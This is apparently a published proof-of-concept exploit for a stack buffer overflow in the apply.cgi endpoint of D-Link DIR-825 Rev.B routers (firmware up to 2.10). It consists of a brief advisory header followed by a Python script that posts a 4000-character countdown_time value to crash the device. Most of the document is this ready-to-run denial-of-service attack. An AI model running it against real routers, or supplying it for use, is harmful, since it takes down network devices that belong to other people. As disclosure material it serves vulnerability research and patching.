D-Link DIR-825 Rev.B 2.10 Buffer Overflow
# Exploit Title: D-Link DIR-825 D-Link DIR-825 Rev.B 2.10 Buffer Overflow
# Exploit Title: D-Link DIR-825 Rev.B 2.10 - Stack Buffer Overflow (DoS)
# Google Dork: N/A
# Date: 2025-09-25
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://www.dlink.com/
# Software Link: https://tsd.dlink.com.tw/downloads2008detail.asp
# Version: DIR-825 Rev.B <= 2.10
# Tested on: DIR-825 Rev.B physical hardware, local network
# CVE: CVE-2025-10666
#
# Description:
# A stack-based buffer overflow vulnerability exists in the apply.cgi endpoint of the
# D-Link DIR-825 Rev.B router (firmware <= 2.10), triggered via the countdown_time parameter.
# This PoC sends an overly long POST parameter to crash the process.
import requests
TARGET = "http://192.168.0.1/apply.cgi" # Change this to the router's IP
LENGTH = 4000 # Adjust length for testing / fuzzing
PAYLOAD = "1" * LENGTH
headers = {
"User-Agent": "Mozilla/5.0",
"Content-Type": "application/x-www-form-urlencoded",
"Referer": "http://192.168.0.1/",
}
data = {
"countdown_time": PAYLOAD
}
try:
print(f"[+] Sending exploit payload ({LENGTH} bytes) to {TARGET}")
r = requests.post(TARGET, headers=headers, data=data, timeout=5)
print(f"[+] Status Code: {r.status_code}")
print("[+] Exploit sent. Check if the router crashes or becomes unresponsive.")
except Exception as e:
print(f"[-] Failed to send exploit: {e}")